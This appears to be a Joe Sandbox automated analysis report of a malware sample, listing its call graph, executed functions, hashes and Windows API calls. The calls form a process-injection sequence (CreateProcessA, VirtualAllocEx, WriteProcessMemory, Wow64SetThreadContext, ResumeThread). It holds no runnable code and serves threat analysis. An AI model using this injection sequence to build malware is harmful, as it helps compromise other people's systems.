766e56e 28637->28657 28673 766e508 28637->28673 28638 766baab 28644 766e4fc 28642->28644 28643 766e4e8 28643->28638 28644->28643 28688 766eb98 28644->28688 28693 766ea1b 28644->28693 28698 766ee7a 28644->28698 28703 766ecdc 28644->28703 28711 766ec3c 28644->28711 28716 766ec9f 28644->28716 28721 766edf5 28644->28721 28725 766ee36 28644->28725 28729 766ebd6 28644->28729 28733 766ec4e 28644->28733 28738 766eb42 28644->28738 28743 766e9a4 28644->28743 28658 766e4fc 28657->28658 28659 766e571 28657->28659 28660 766e9a4 2 API calls 28658->28660 28661 766eb42 3 API calls 28658->28661 28662 766ec4e 2 API calls 28658->28662 28663 766ebd6 2 API calls 28658->28663 28664 766ee36 2 API calls 28658->28664 28665 766e4e8 28658->28665 28666 766edf5 2 API calls 28658->28666 28667 766ec9f 2 API calls 28658->28667 28668 766ec3c 2 API calls 28658->28668 28669 766ecdc 4 API calls 28658->28669 28670 766ee7a 2 API calls 28658->28670 28671 766ea1b 2 API calls 28658->28671 28672 766eb98 2 API calls 28658->28672 28659->28638 28660->28665 28661->28665 28662->28665 28663->28665 28664->28665 28665->28638 28666->28665 28667->28665 28668->28665 28669->28665 28670->28665 28671->28665 28672->28665 28674 766e522 28673->28674 28675 766e9a4 2 API calls 28674->28675 28676 766eb42 3 API calls 28674->28676 28677 766ec4e 2 API calls 28674->28677 28678 766ebd6 2 API calls 28674->28678 28679 766ee36 2 API calls 28674->28679 28680 766e52a 28674->28680 28681 766edf5 2 API calls 28674->28681 28682 766ec9f 2 API calls 28674->28682 28683 766ec3c 2 API calls 28674->28683 28684 766ecdc 4 API calls 28674->28684 28685 766ee7a 2 API calls 28674->28685 28686 766ea1b 2 API calls 28674->28686 28687 766eb98 2 API calls 28674->28687 28675->28680 28676->28680 28677->28680 28678->28680 28679->28680 28680->28638 28681->28680 28682->28680 28683->28680 28684->28680 28685->28680 28686->28680 28687->28680 28689 766eb9c 28688->28689 28748 766adc7 28689->28748 28752 766adc8 28689->28752 28690 766ea95 28694 766ea21 28693->28694 28694->28643 28695 766f34e 28694->28695 28756 766b390 28694->28756 28760 766b398 28694->28760 28699 766ee8a 28698->28699 28701 766b390 WriteProcessMemory 28699->28701 28702 766b398 WriteProcessMemory 28699->28702 28700 766f0f4 28701->28700 28702->28700 28704 766ecf2 28703->28704 28706 766ea32 28704->28706 28764 766b2d7 28704->28764 28768 766b2d8 28704->28768 28705 766f34e 28706->28643 28706->28705 28707 766b390 WriteProcessMemory 28706->28707 28708 766b398 WriteProcessMemory 28706->28708 28707->28706 28708->28706 28712 766eb9c 28711->28712 28714 766adc7 Wow64SetThreadContext 28712->28714 28715 766adc8 Wow64SetThreadContext 28712->28715 28713 766ea95 28714->28713 28715->28713 28717 766ea32 28716->28717 28717->28643 28718 766f34e 28717->28718 28719 766b390 WriteProcessMemory 28717->28719 28720 766b398 WriteProcessMemory 28717->28720 28719->28717 28720->28717 28772 766f7d0 28721->28772 28777 766f7c1 28721->28777 28722 766ee0d 28727 766b390 WriteProcessMemory 28725->28727 28728 766b398 WriteProcessMemory 28725->28728 28726 766ee5a 28727->28726 28728->28726 28730 766ebe3 28729->28730 28782 766ad17 28730->28782 28786 766ad18 28730->28786 28735 766ec54 28733->28735 28734 766f3a4 28735->28734 28736 766ad17 ResumeThread 28735->28736 28737 766ad18 ResumeThread 28735->28737 28736->28735 28737->28735 28790 766b487 28738->28790 28794 766b488 28738->28794 28798 766b480 28738->28798 28739 766ea03 28739->28643 28744 766e9aa 28743->28744 28802 766b620 28744->28802 28806 766b61f 28744->28806 28749 766adc8 Wow64SetThreadContext 28748->28749 28751 766ae55 28749->28751 28751->28690 28753 766ae0d Wow64SetThreadContext 28752->28753 28755 766ae55 28753->28755 28755->28690 28757 766b398 WriteProcessMemory 28756->28757 28759 766b437 28757->28759 28759->28694 28761 766b3e0 WriteProcessMemory 28760->28761 28763 766b437 28761->28763 28763->28694 28765 766b2d8 VirtualAllocEx 28764->28765 28767 766b355 28765->28767 28767->28706 28769 766b318 VirtualAllocEx 28768->28769 28771 766b355 28769->28771 28771->28706 28773 766f7d5 28772->28773 28775 766adc7 Wow64SetThreadContext 28773->28775 28776 766adc8 Wow64SetThreadContext 28773->28776 28774 766f7fb 28774->28722 28775->28774 28776->28774 28778 766f7d0 28777->28778 28780 766adc7 Wow64SetThreadContext 28778->28780 28781 766adc8 Wow64SetThreadContext 28778->28781 28779 766f7fb 28779->28722 28780->28779 28781->28779 28783 766ad18 ResumeThread 28782->28783 28785 766ad89 28783->28785 28785->28730 28787 766ad58 ResumeThread 28786->28787 28789 766ad89 28787->28789 28789->28730 28791 766b488 ReadProcessMemory 28790->28791 28793 766b517 28791->28793 28793->28739 28795 766b4d3 ReadProcessMemory 28794->28795 28797 766b517 28795->28797 28797->28739 28799 766b486 28798->28799 28800 766b4e5 ReadProcessMemory 28798->28800 28799->28739 28801 766b517 28800->28801 28801->28739 28803 766b6a9 CreateProcessA 28802->28803 28805 766b86b 28803->28805 28807 766b620 CreateProcessA 28806->28807 28809 766b86b 28807->28809 28635 2cdd6a0 DuplicateHandle 28636 2cdd736 28635->28636 28810 766f818 28811 766f9a3 28810->28811 28813 766f83e 28810->28813 28813->28811 28814 7669b94 28813->28814 28815 766fa98 PostMessageW 28814->28815 28816 766fb04 28815->28816 28816->28813

                                                                                Executed Functions

                                                                                Function 0B0209F8 Relevance: .6, Instructions: 636COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1872374871.000000000B020000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B020000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b020000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d887e493155c811b3bc8255579fe25e636141517e1613f9d56d4ed68e79eb55f
                                                                                • Instruction ID: 06d3da0690de4692a51443b3287e5ea342efbbc7eeca0085300ec40c43c9fec0
                                                                                • Opcode Fuzzy Hash: d887e493155c811b3bc8255579fe25e636141517e1613f9d56d4ed68e79eb55f
                                                                                • Instruction Fuzzy Hash: 82328974B013149FDB59DB69C4A0BAEBBF7AF88700F248469E506DB3A4DB34E905CB50
                                                                                Function 0766EF97 Relevance: .0, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0ef3748121c4d219a3aeda68b1f42ff3be065142b427865c6990fff46435cfd5
                                                                                • Instruction ID: 32625c30152efa3f4b5eae5f8d8558aebafb67794934d72c1f71d42d9555bea1
                                                                                • Opcode Fuzzy Hash: 0ef3748121c4d219a3aeda68b1f42ff3be065142b427865c6990fff46435cfd5
                                                                                • Instruction Fuzzy Hash: 5CD012F5D2E140CFCB41AF60B45C5F476FCAB1B205F8430A6940FA7102D5608541DA79
                                                                                Function 02CDD448 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 526 2cdd448-2cdd4e7 GetCurrentProcess 530 2cdd4e9-2cdd4ef 526->530 531 2cdd4f0-2cdd524 GetCurrentThread 526->531 530->531 532 2cdd52d-2cdd561 GetCurrentProcess 531->532 533 2cdd526-2cdd52c 531->533 535 2cdd56a-2cdd585 call 2cdd627 532->535 536 2cdd563-2cdd569 532->536 533->532 539 2cdd58b-2cdd5ba GetCurrentThreadId 535->539 536->535 540 2cdd5bc-2cdd5c2 539->540 541 2cdd5c3-2cdd625 539->541 540->541
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 02CDD4D6
                                                                                • GetCurrentThread.KERNEL32 ref: 02CDD513
                                                                                • GetCurrentProcess.KERNEL32 ref: 02CDD550
                                                                                • GetCurrentThreadId.KERNEL32 ref: 02CDD5A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: baba2ae7296256e9ff26bb019da1632a1a9d5934f33995d531e92c9c9e70a95c
                                                                                • Instruction ID: 5b52ac41fce52b78205881d23d71fae3843242ae35bfdd099e4674d8813280cf
                                                                                • Opcode Fuzzy Hash: baba2ae7296256e9ff26bb019da1632a1a9d5934f33995d531e92c9c9e70a95c
                                                                                • Instruction Fuzzy Hash: 495187B0D00649CFDB54CFAAD548BDEBBF1EF88314F24849AE009A7360D7746944CB65
                                                                                Function 02CDD458 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 548 2cdd458-2cdd4e7 GetCurrentProcess 552 2cdd4e9-2cdd4ef 548->552 553 2cdd4f0-2cdd524 GetCurrentThread 548->553 552->553 554 2cdd52d-2cdd561 GetCurrentProcess 553->554 555 2cdd526-2cdd52c 553->555 557 2cdd56a-2cdd585 call 2cdd627 554->557 558 2cdd563-2cdd569 554->558 555->554 561 2cdd58b-2cdd5ba GetCurrentThreadId 557->561 558->557 562 2cdd5bc-2cdd5c2 561->562 563 2cdd5c3-2cdd625 561->563 562->563
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 02CDD4D6
                                                                                • GetCurrentThread.KERNEL32 ref: 02CDD513
                                                                                • GetCurrentProcess.KERNEL32 ref: 02CDD550
                                                                                • GetCurrentThreadId.KERNEL32 ref: 02CDD5A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 084d8ac13c3f02079db7faab92a51f08dd7c074320bf4b978baf897c3d1dcabf
                                                                                • Instruction ID: f1295805b2f51f8c27b486112815faea308438f1dd211609c91f56192835a7a6
                                                                                • Opcode Fuzzy Hash: 084d8ac13c3f02079db7faab92a51f08dd7c074320bf4b978baf897c3d1dcabf
                                                                                • Instruction Fuzzy Hash: D35164B0E00649CFDB54CFAAD948BDEBBF1EF88314F248459E019A7350DB74A984CB65
                                                                                Function 0766B61F Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 654 766b61f-766b6b5 657 766b6b7-766b6c1 654->657 658 766b6ee-766b70e 654->658 657->658 659 766b6c3-766b6c5 657->659 663 766b747-766b776 658->663 664 766b710-766b71a 658->664 661 766b6c7-766b6d1 659->661 662 766b6e8-766b6eb 659->662 665 766b6d5-766b6e4 661->665 666 766b6d3 661->666 662->658 674 766b7af-766b869 CreateProcessA 663->674 675 766b778-766b782 663->675 664->663 667 766b71c-766b71e 664->667 665->665 668 766b6e6 665->668 666->665 669 766b720-766b72a 667->669 670 766b741-766b744 667->670 668->662 672 766b72e-766b73d 669->672 673 766b72c 669->673 670->663 672->672 676 766b73f 672->676 673->672 686 766b872-766b8f8 674->686 687 766b86b-766b871 674->687 675->674 677 766b784-766b786 675->677 676->670 679 766b788-766b792 677->679 680 766b7a9-766b7ac 677->680 681 766b796-766b7a5 679->681 682 766b794 679->682 680->674 681->681 683 766b7a7 681->683 682->681 683->680 697 766b8fa-766b8fe 686->697 698 766b908-766b90c 686->698 687->686 697->698 701 766b900 697->701 699 766b90e-766b912 698->699 700 766b91c-766b920 698->700 699->700 702 766b914 699->702 703 766b922-766b926 700->703 704 766b930-766b934 700->704 701->698 702->700 703->704 705 766b928 703->705 706 766b946-766b94d 704->706 707 766b936-766b93c 704->707 705->704 708 766b964 706->708 709 766b94f-766b95e 706->709 707->706 710 766b965 708->710 709->708 710->710
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0766B856
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: baf71602092083de33adb99964d1d1db9869eed13ea192feed77a3bb3873e6a0
                                                                                • Instruction ID: 435bbf7daa36ee9c85626b0c5b99c01980e861536ade268182027da0f8473f36
                                                                                • Opcode Fuzzy Hash: baf71602092083de33adb99964d1d1db9869eed13ea192feed77a3bb3873e6a0
                                                                                • Instruction Fuzzy Hash: A9915AB1D0025ADFDF24DF68C885BEDBBB2AF48310F6485A9D809E7240DB749985CF91
                                                                                Function 0766B620 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 712 766b620-766b6b5 714 766b6b7-766b6c1 712->714 715 766b6ee-766b70e 712->715 714->715 716 766b6c3-766b6c5 714->716 720 766b747-766b776 715->720 721 766b710-766b71a 715->721 718 766b6c7-766b6d1 716->718 719 766b6e8-766b6eb 716->719 722 766b6d5-766b6e4 718->722 723 766b6d3 718->723 719->715 731 766b7af-766b869 CreateProcessA 720->731 732 766b778-766b782 720->732 721->720 724 766b71c-766b71e 721->724 722->722 725 766b6e6 722->725 723->722 726 766b720-766b72a 724->726 727 766b741-766b744 724->727 725->719 729 766b72e-766b73d 726->729 730 766b72c 726->730 727->720 729->729 733 766b73f 729->733 730->729 743 766b872-766b8f8 731->743 744 766b86b-766b871 731->744 732->731 734 766b784-766b786 732->734 733->727 736 766b788-766b792 734->736 737 766b7a9-766b7ac 734->737 738 766b796-766b7a5 736->738 739 766b794 736->739 737->731 738->738 740 766b7a7 738->740 739->738 740->737 754 766b8fa-766b8fe 743->754 755 766b908-766b90c 743->755 744->743 754->755 758 766b900 754->758 756 766b90e-766b912 755->756 757 766b91c-766b920 755->757 756->757 759 766b914 756->759 760 766b922-766b926 757->760 761 766b930-766b934 757->761 758->755 759->757 760->761 762 766b928 760->762 763 766b946-766b94d 761->763 764 766b936-766b93c 761->764 762->761 765 766b964 763->765 766 766b94f-766b95e 763->766 764->763 767 766b965 765->767 766->765 767->767
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0766B856
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 2d6ce9e186a7cc48bf8d5ade02b4e3c1fd246fbbbeb2181c6fe364b7a6420923
                                                                                • Instruction ID: 0c3b4691654b22a1af580212179b369e46a225a55a4a53771460f530befe0e03
                                                                                • Opcode Fuzzy Hash: 2d6ce9e186a7cc48bf8d5ade02b4e3c1fd246fbbbeb2181c6fe364b7a6420923
                                                                                • Instruction Fuzzy Hash: 71915AB1D0025ACFDF24DF68C885BEDBBB2AF48310F6485A9D809E7240DB749985CF91
                                                                                Function 02CDADC8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 769 2cdadc8-2cdadd7 770 2cdadd9-2cdade6 call 2cd93f4 769->770 771 2cdae03-2cdae07 769->771 776 2cdadfc 770->776 777 2cdade8 770->777 773 2cdae09-2cdae13 771->773 774 2cdae1b-2cdae5c 771->774 773->774 780 2cdae5e-2cdae66 774->780 781 2cdae69-2cdae77 774->781 776->771 824 2cdadee call 2cdb051 777->824 825 2cdadee call 2cdb060 777->825 780->781 782 2cdae79-2cdae7e 781->782 783 2cdae9b-2cdae9d 781->783 785 2cdae89 782->785 786 2cdae80-2cdae87 call 2cda130 782->786 788 2cdaea0-2cdaea7 783->788 784 2cdadf4-2cdadf6 784->776 787 2cdaf38-2cdaff8 784->787 790 2cdae8b-2cdae99 785->790 786->790 819 2cdaffa-2cdaffd 787->819 820 2cdb000-2cdb02b GetModuleHandleW 787->820 791 2cdaea9-2cdaeb1 788->791 792 2cdaeb4-2cdaebb 788->792 790->788 791->792 794 2cdaebd-2cdaec5 792->794 795 2cdaec8-2cdaed1 call 2cda140 792->795 794->795 800 2cdaede-2cdaee3 795->800 801 2cdaed3-2cdaedb 795->801 802 2cdaee5-2cdaeec 800->802 803 2cdaf01-2cdaf0e 800->803 801->800 802->803 805 2cdaeee-2cdaefe call 2cda150 call 2cda160 802->805 810 2cdaf31-2cdaf37 803->810 811 2cdaf10-2cdaf2e 803->811 805->803 811->810 819->820 821 2cdb02d-2cdb033 820->821 822 2cdb034-2cdb048 820->822 821->822 824->784 825->784
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 02CDB01E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: b1e9ea5c9ddd0518094b70ea925e1f6baef579e836cd5f11e3f0b7ccff875d12
                                                                                • Instruction ID: ed22f05cdc17c902d0c168de1ca672f645d335fcb0e877844e366cf284d6ef5c
                                                                                • Opcode Fuzzy Hash: b1e9ea5c9ddd0518094b70ea925e1f6baef579e836cd5f11e3f0b7ccff875d12
                                                                                • Instruction Fuzzy Hash: FC7122B0A00B458FD724DF2AD44475ABBF2FF88304F008A2ED58A9BB50D775E955CB90
                                                                                Function 02CD5914 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 826 2cd5914-2cd591e 827 2cd5920-2cd59e1 CreateActCtxA 826->827 829 2cd59ea-2cd5a44 827->829 830 2cd59e3-2cd59e9 827->830 837 2cd5a46-2cd5a49 829->837 838 2cd5a53-2cd5a57 829->838 830->829 837->838 839 2cd5a59-2cd5a65 838->839 840 2cd5a68-2cd5a98 838->840 839->840 844 2cd5a4a-2cd5a4f 840->844 845 2cd5a9a-2cd5b1c 840->845 844->838
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 02CD59D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: aad2ca0e15ba98c030cb5dc885aa4225475a4dcdd96a032abf2ecdcfaf0f9564
                                                                                • Instruction ID: 22939e240e2ffdc2ee3148f3cdd95ac8ad6801f984332f5265bc286e06a5c3a9
                                                                                • Opcode Fuzzy Hash: aad2ca0e15ba98c030cb5dc885aa4225475a4dcdd96a032abf2ecdcfaf0f9564
                                                                                • Instruction Fuzzy Hash: DE4113B0C00619CFDB24CFAAC884BCDBBF5BF49304F60805AD408AB255DBB5694ACF90
                                                                                Function 02CD44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 848 2cd44b4-2cd59e1 CreateActCtxA 851 2cd59ea-2cd5a44 848->851 852 2cd59e3-2cd59e9 848->852 859 2cd5a46-2cd5a49 851->859 860 2cd5a53-2cd5a57 851->860 852->851 859->860 861 2cd5a59-2cd5a65 860->861 862 2cd5a68-2cd5a98 860->862 861->862 866 2cd5a4a-2cd5a4f 862->866 867 2cd5a9a-2cd5b1c 862->867 866->860
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 02CD59D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 76f1a180ca0e6368bb36328cae259aa9e343961b6f9cc95fa70faef89b563477
                                                                                • Instruction ID: c76b4b0ffa98afbd3a62980438f454daa944342ca91c2c3e94cf23fc4d483397
                                                                                • Opcode Fuzzy Hash: 76f1a180ca0e6368bb36328cae259aa9e343961b6f9cc95fa70faef89b563477
                                                                                • Instruction Fuzzy Hash: FB41E3B0D00619CBDB24CFAAC884BDEBBF5FF49314F60806AD508AB255DBB56945CF90
                                                                                Function 0766B390 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 870 766b390-766b3e6 873 766b3f6-766b435 WriteProcessMemory 870->873 874 766b3e8-766b3f4 870->874 876 766b437-766b43d 873->876 877 766b43e-766b46e 873->877 874->873 876->877
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0766B428
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 27fa9e3cfbe510c54470497268c4455d8482f449af6b6a974772539e0bd9b3a1
                                                                                • Instruction ID: 496015b7f3c5250687e999e99a11a0aced644b73accf3400419656da0403ab39
                                                                                • Opcode Fuzzy Hash: 27fa9e3cfbe510c54470497268c4455d8482f449af6b6a974772539e0bd9b3a1
                                                                                • Instruction Fuzzy Hash: 932128B1900249DFDB10CFA9C885AEEBBF5FF48320F508429E919A7240D7789944CBA5
                                                                                Function 0766B398 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 881 766b398-766b3e6 883 766b3f6-766b435 WriteProcessMemory 881->883 884 766b3e8-766b3f4 881->884 886 766b437-766b43d 883->886 887 766b43e-766b46e 883->887 884->883 886->887
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0766B428
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: cb40da8a1714159546c50f59acc48b43420a8f3694de7ac28cda1bb1e20fdc7b
                                                                                • Instruction ID: e4e9f0c578b97896b29f34e145fbc820576e70c7c50e0f33006bca21fc98d4f7
                                                                                • Opcode Fuzzy Hash: cb40da8a1714159546c50f59acc48b43420a8f3694de7ac28cda1bb1e20fdc7b
                                                                                • Instruction Fuzzy Hash: BE2126B1900259DFDB10CFAAC885BEEBBF5FF48320F548429E919A7240D7789944CBA0
                                                                                Function 02CDD698 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 891 2cdd698-2cdd69c 892 2cdd69e-2cdd6df 891->892 893 2cdd6e2-2cdd734 DuplicateHandle 891->893 892->893 894 2cdd73d-2cdd75a 893->894 895 2cdd736-2cdd73c 893->895 895->894
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02CDD727
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 6d6e8ab7b5e48ff2955ee0fcb293027dce57749ef36543a7e87786ea041d896b
                                                                                • Instruction ID: 04e19f468f3d8ce29213dd2c4747f73ebf1b1c981b8ac3307e98653d1a95846b
                                                                                • Opcode Fuzzy Hash: 6d6e8ab7b5e48ff2955ee0fcb293027dce57749ef36543a7e87786ea041d896b
                                                                                • Instruction Fuzzy Hash: A22124B5900289DFDB10CFA9D984ADEBFF4EB48320F18855AE954A7250C378A941CFA0
                                                                                Function 0766B487 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0766B508
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: b4e18c224959c4209d22fcc562d35c5f34807b78c4ebc4ace489efe4534d5d9b
                                                                                • Instruction ID: 84733217bad2acace2b27a6acb99c19a301bf4d16d5cf8e297b72e49df8b2ce9
                                                                                • Opcode Fuzzy Hash: b4e18c224959c4209d22fcc562d35c5f34807b78c4ebc4ace489efe4534d5d9b
                                                                                • Instruction Fuzzy Hash: 4F2139B1D00259DFDB10CFAAC845AEEFBF5FF48320F54882AE519A7240C7799940CBA1
                                                                                Function 0766ADC7 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 898 766adc7-766ae13 901 766ae15-766ae21 898->901 902 766ae23-766ae53 Wow64SetThreadContext 898->902 901->902 904 766ae55-766ae5b 902->904 905 766ae5c-766ae8c 902->905 904->905
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766AE46
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: f2489a6d440de34af9ff5ff90857c7827e596dcabeba96477be5073b373de0a9
                                                                                • Instruction ID: 9155eee9caeda28ac73633b5ac66375d15b83ba110807dcc48471b238e4885d0
                                                                                • Opcode Fuzzy Hash: f2489a6d440de34af9ff5ff90857c7827e596dcabeba96477be5073b373de0a9
                                                                                • Instruction Fuzzy Hash: 142137B59002099FDB10DFAAC485BEEBBF4EF88320F54842AD519B7240CB789944CFA1
                                                                                Function 0766B488 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0766B508
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: e6a0a61c8a7f714602b3acf4458fbcb933fb6a0384774f28b4ab82a259ef98d6
